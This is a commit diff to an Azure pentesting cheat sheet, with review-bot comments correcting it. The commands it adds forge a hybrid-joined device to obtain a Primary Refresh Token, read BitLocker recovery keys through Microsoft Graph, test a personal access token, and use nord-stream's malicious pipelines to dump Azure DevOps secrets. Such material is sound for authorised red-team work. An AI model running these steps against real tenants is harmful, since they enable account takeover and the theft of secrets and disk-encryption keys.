Azure Devops + Devices + Bitlocker
parent
4947154dc7
commit
e1341751c3
|
@ -129,6 +129,23 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
|
|||
```
|
||||
|
||||
|
||||
### Request a PRT with Hybrid Device
|
||||
|
||||
Requirements:
|
||||
* ADDS user credentials
|
||||
* hybrid environment (ADDS and Azure AD)
|
||||
|
||||
Use the user account to create a computer and request a PRT
|
||||
* Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>`
|
||||
* Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10 -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>`
|
||||
* Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'`
|
||||
* Get a PRT with device claim
|
||||
```ps1
|
||||
roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password>
|
||||
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
|
||||
|
|
|
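Review bot: the UPN in the `roadtx prt` line has a stray `h`: `-u <username>@h<domain>` should read `-u <username>@<domain>`, otherwise it never matches the synced user. Two placeholder mismatches in the same procedure also need reconciling: the certificate files are called `<machine-account>.pem`/`.key` in the `roadtx hybriddevice` step but `<hybrid-device-name>.pem`/`.key` in the `roadtx prt` step, and the `setcert.py` step hard-codes `10.10.10.10` where every other step uses `<dc-ip>`. The `impacket-addcomputer` invocation passes neither `-computer-name` nor `-computer-pass`, so the reader has to capture the randomly generated account name and password from the tool's output to fill `<machine-account$>` and `<machine-password>`; say so, and note that this step only works when the user may add computer objects (MachineAccountQuota above zero or delegated rights). Finally, `--sid '<device-sid>'` is introduced without saying it is the objectSid of the computer account just created, and the registration step assumes Azure AD Connect has already synced that computer object, including its userCertificate, to Azure AD; both deserve a sentence, since `roadtx hybriddevice` fails until that sync has run.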
@ -23,6 +23,16 @@
|
|||
|
||||
## Devices
|
||||
|
||||
### List Devices
|
||||
|
||||
```ps1
|
||||
Connect-AzureAD
|
||||
Get-AzureADDevice
|
||||
$user = Get-AzureADUser -SearchString "username"
|
||||
Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
|
||||
```
|
||||
|
||||
|
||||
### Join Devices
|
||||
|
||||
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
|
||||
|
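Review bot: the `List Devices` block relies on the AzureAD module (`Connect-AzureAD`, `Get-AzureADDevice`, `Get-AzureADUserRegisteredDevice`), which Microsoft has deprecated in favour of Microsoft Graph PowerShell, and the BitLocker block added further down this same file already uses `Connect-MgGraph`; list the Graph equivalents alongside, e.g. `Connect-MgGraph -Scopes Device.Read.All`, `Get-MgDevice -All`, `Get-MgUserRegisteredDevice -UserId $user.Id -All`. `Get-AzureADUser -SearchString "username"` can return several objects, so `$user.ObjectId` may be an array; look the user up by UPN (`-ObjectId user@domain`) or index the result. The `Join Devices` subsection consists of a single link to the Intune enrollment docs and explains nothing; either add the one or two steps the reader needs or move the link to the References list.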
@ -45,11 +55,21 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
|
|||
```
|
||||
|
||||
|
||||
### Bitlocker Keys
|
||||
|
||||
```ps1
|
||||
Install-Module Microsoft.Graph -Scope CurrentUser
|
||||
Import-Module Microsoft.Graph.Identity.SignIns
|
||||
Connect-MgGraph -Scopes BitLockerKey.Read.All
|
||||
Get-MgInformationProtectionBitlockerRecoveryKey -All
|
||||
Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId
|
||||
```
|
||||
|
||||
|
||||
# Service Principals
|
||||
|
||||
|
||||
|
||||
# Other
|
||||
## Other
|
||||
|
||||
Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:
|
||||
|
||||
|
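Review bot: `Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId` as written still does not return the recovery key: the Graph endpoint only includes the `key` property when it is explicitly selected, so the line needs `-Property key` (the `$select=key` equivalent), and `$bitlockerRecoveryKeyId` is never assigned in the block; take it from the `-All` listing, e.g. `$ids = (Get-MgInformationProtectionBitlockerRecoveryKey -All).Id`. Worth a sentence as well: the listing call returns only metadata (id, creation time, volume type, device id), and reading `key` additionally requires the signed-in user to hold one of the directory roles allowed to read recovery keys, so `BitLockerKey.Read.All` consent alone is not enough. The product is spelled `BitLocker`, not `Bitlocker`, in the heading. Structurally, `# Service Principals` is added as an empty top-level heading, and `# Other` is immediately followed by `## Other`; drop the empty heading or give it content, and keep only one of the two `Other` headings.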
@ -57,3 +77,8 @@ Lists all the client IDs you can use to get a token with the `mail.read` scope o
|
|||
roadtx getscope -s https://graph.microsoft.com/mail.read
|
||||
roadtx findscope -s https://graph.microsoft.com/mail.read
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps)
|
||||
|
|
|
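Review bot: `roadtx getscope -s https://graph.microsoft.com/mail.read` and `roadtx findscope -s https://graph.microsoft.com/mail.read` are listed back to back under a single sentence of explanation ("Lists all the client IDs you can use to get a token with the `mail.read` scope"); if both are intended, say what distinguishes their output, otherwise keep the one that matches the description. The added reference `* [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps)` carries no author, while the same link is cited with an author elsewhere in this commit; use one form.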
@ -22,6 +22,25 @@ Runbook must be SAVED and PUBLISHED before running it.
|
|||
```
|
||||
|
||||
|
||||
## Azure Devops
|
||||
|
||||
* Verify the validity of an Azure Personal Access Token (PAT)
|
||||
```ps1
|
||||
PAT=""
|
||||
organization=""
|
||||
curl -u :${PAT} https://dev.azure.com/${organization}/_apis/build-release/builds
|
||||
```
|
||||
|
||||
* [synacktiv/nord-stream](https://github.com/synacktiv/nord-stream) - Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab.
|
||||
```ps1
|
||||
# List all secrets from all projects
|
||||
$ nord-stream.py devops --token "$PAT" --org myorg --list-secrets
|
||||
|
||||
# Dump all secrets from all projects
|
||||
$ nord-stream.py devops --token "$PAT" --org myorg
|
||||
```
|
||||
|
||||
|
||||
## Microsoft Intune
|
||||
|
||||
* LAPS
|
||||
|
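Review bot: the PAT check `curl -u :${PAT} https://dev.azure.com/${organization}/_apis/build-release/builds` targets a path that is not the Builds API (`_apis/build/builds`), and that API is project-scoped anyway (`/{organization}/{project}/_apis/build/builds`); an organisation-level call that needs no project, such as `curl -u :${PAT} "https://dev.azure.com/${organization}/_apis/projects?api-version=7.0"`, is a better validity probe. Whichever endpoint is used, Azure DevOps answers an invalid or expired PAT with a 203 and an HTML sign-in page rather than a 401, so tell the reader to check the status code (`-s -o /dev/null -w '%{http_code}'`, expecting 200) instead of merely that output came back. The block is fenced as `ps1` but is bash (`${PAT}`, `$ nord-stream.py ...`); tag it `bash`. For nord-stream, the description in the same hunk says it works by deploying malicious pipelines, so the dump command runs pipelines and leaves runs and branches in the projects' history; a warning to that effect belongs next to `nord-stream.py devops --token "$PAT" --org myorg`, with `--list-secrets` identified as the enumeration-only step. `## Microsoft Intune` is added with a bare `* LAPS` bullet and no content.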
@ -73,3 +92,4 @@ Get-MgDrive -top 1
|
|||
|
||||
* [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)
|
||||
* [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview)
|
||||
* [Pentesting Azure Mindmap - Alexis Danizan](https://github.com/synacktiv/Mindmaps)
|
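Review bot: the three added references use three different formats (`Microsoft Graph - servicePrincipal: addPassword`, `Microsoft Intune - Microsoft Intune support for Windows LAPS`, `Pentesting Azure Mindmap - Alexis Danizan`); normalise them to the `Title - Author - Date` form used by the reference added earlier in this commit. The LAPS reference backs a section that so far reads only `* LAPS`, so either add the content it supports or hold the reference until that section is written.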